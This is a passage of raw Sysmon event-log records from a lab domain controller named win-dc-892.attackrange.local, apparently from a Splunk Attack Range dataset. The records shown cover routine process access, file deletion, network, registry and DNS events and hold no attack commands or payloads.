ll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:47.283{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B66C6A1B6F2BE1EB56ECA858E40DE1DA,SHA256=E1EF3485686063AD68E6B5623475381245F19250093BC7E49A0CF1EA21685238,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.264{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58086-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.264{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58086-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 23542300x80000000000000003693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:48.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6A56423129B5950AEF5617D9981B4A,SHA256=E9D4A086AC03C047E490372CAE984634EA94EA7389AB9215DE963873F6B7235F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:49.658{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ECF05E542793234C45DCF49546E1500,SHA256=C45A7614405E2434106AB97F61DDF67DBCC834A895D82710A5D23B1A1EDAA09C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:50.689{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2732D91B2C3EEE1A6C41E1200A53118E,SHA256=24072886F4586B7A469604903486CFB36012C8EAE10195F9CFC7B8B56E6C1849,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:51.845{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=630112BDD7B077B9DD7C1D2B317D8109,SHA256=39A95B49B3F9E5E04ECB630F05CE013B48B1342B9B9A4BBC1D7354DED048735D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:52.908{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85CC3D5974AD9388C73B3B88C689BC9A,SHA256=14CEB531AC834B2442FF152EAEF22ECD36FAE2606FBFBC91DCDC658FF1B8F47E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:53.924{266CAFBE-648B-6064-7A00-00000000AE01}4692NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246B4891C80EBE7832800FF20BDF71B2,SHA256=4F834DBB24D77B4DF830390246C04174E9DBFEC626B860989E1572E683B3EB65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:54.924{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9832A33EF3C0246FDAD726AF7D7C09C0,SHA256=F331D0FA7EF7D3A90FB3C80066F393FEDC3D93BFBF9173C868308355956ABEF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:55.939{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ACDD7D153A125B3576498E7BC2FCDC1,SHA256=5440630060172A08BC52DFF773822204711722671BC4079261D550CAE0B55BAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:57.002{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD9C1DBC22AC32B5E20456870B0A4795,SHA256=EC4233ECC86645D72444B6E0E4A6FDB391936C1C3BD2FF56BDB1D7F1C4D6F27A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000003704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:58.205{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CFE2527AE03ED620C21212A33B8785E,SHA256=C3B1C77D179614B9F66F460C37EA50BC33384BC80D9D9BAD0C2F13DC7DB61300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:59.205{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF6ED0E004B7E1CF31EB1651A4DF9A8D,SHA256=1E67B83C8BD6A50CB4779DD28EA0D7182DBB88EDCBD433027BC716D270D14905,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:00.298{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E253FEF935B586D3279B725F862C5E5,SHA256=4C7865979508B9E21E4C39A9559EB5B5C320C07D6FBF8AB56B4DFC772565CC10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:01.330{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F370B5BFF2AECDF7AFC1922AB36EB488,SHA256=65D5B5FB9C2C26A3F679DA173462231C7424895CBF974F014CB1F3125275B3F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:02.345{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DB86816DDF4AC678F8D6EB19FD2C9A1,SHA256=47F9FC1BC48B085345F019F29025673B5747A3EEA33AFFBC87A37FF1ED0A1F02,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:02.044{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse46.128.24.64-53872-false10.0.1.14win-dc-892.attackrange.local3389ms-wbt-server 23542300x80000000000000003709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:03.361{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119B2518C04607706369A14937CA7EA9,SHA256=F2A95AE65FBAD1CA3CB633C58BFCBA67ECE49931860783F857A6FBCDA5539512,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchDomainATTACKRANGE 
13241300x80000000000000003730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastSuccessfulADS&SFetchBinary Data 13241300x80000000000000003729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchContents* 13241300x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{e0c459ce-7fc4-4651-b291-1f61fb5721e9}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000003727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{e0c459ce-7fc4-4651-b291-1f61fb5721e9}\LastProbeTimeDWORD (0x606464bc) 13241300x80000000000000003726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\DateLastConnectedBinary Data 13241300x80000000000000003725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\NameTypeDWORD (0x00000006) 
13241300x80000000000000003724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\DateCreatedBinary Data 13241300x80000000000000003723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\CategoryDWORD (0x00000002) 13241300x80000000000000003722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\ManagedDWORD (0x00000001) 13241300x80000000000000003721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\Descriptionattackrange.local 13241300x80000000000000003720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\ProfileNameattackrange.local 734700x80000000000000003719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.877{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000003718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.798{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:04.798{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.798{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000001) 13241300x80000000000000003715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.798{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000000) 13241300x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.736{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:04.736{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000002) 13241300x80000000000000003712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.736{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\1SWD\IP_TUNNEL_VBUS\Teredo_Tunnel_Device 23542300x80000000000000003711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.377{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=721D343F63BF93F8C80C9611A6C9090F,SHA256=482372BA06A61C2A455D3F83C51B962380A5502EA948A74E20E95A2BF7DABD22,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.952{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58089-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.952{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58089-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.952{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63185- 354300x80000000000000003754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:04.846{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58088-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.846{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-892.attackrange.local58088-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.823{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:28de:33c1:f5ff:fef1-546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x80000000000000003751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.794{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58087-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.794{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58087-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.743{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49218-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local49218- 22542200x80000000000000003748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:05.239{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-8920fe80::28de:33c1:f5ff:fef1;2001:0:2851:782c:28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;C:\Windows\System32\spoolsv.exe 22542200x80000000000000003747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.990{266CAFBE-646C-6064-1000-00000000AE01}1124isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000003746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.959{266CAFBE-646C-6064-1000-00000000AE01}1124win-dc-892.attackrange.local0fe80::28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.958{266CAFBE-646C-6064-1500-00000000AE01}1316eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000003744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.958{266CAFBE-646C-6064-1500-00000000AE01}1316icozbeym1460-C:\Windows\System32\svchost.exe 22542200x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.852{266CAFBE-646C-6064-1500-00000000AE01}1316win-dc-892.attackrange.local0fe80::28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.799{266CAFBE-646C-6064-1100-00000000AE01}1200win-dc-892.attackrange.local0fe80::28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.739{266CAFBE-646C-6064-1000-00000000AE01}1124win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 
trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 23542300x80000000000000003740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.752{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=515C4C759C39D858B32E2DEB50AED2EC,SHA256=A067E2C9F4C70BFB2F3F2E409532881F56B2BEE355FCF0E06B766D2AE1F6944D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.752{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=72254F55CF93AFBB1C6AABEF241CFE28,SHA256=00516D08AB5AA350731E72EFC6C058059A6E2D52510155D0CFC636B70156678C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.377{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E6B82BF32D13654DE3C4614E3E3C65,SHA256=83B02E4A0AF88D3EB2BB323B8D71ED531F62FE6EFA0D0651FED8C57655F848AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.283{266CAFBE-646A-6064-0B00-00000000AE01}856NT 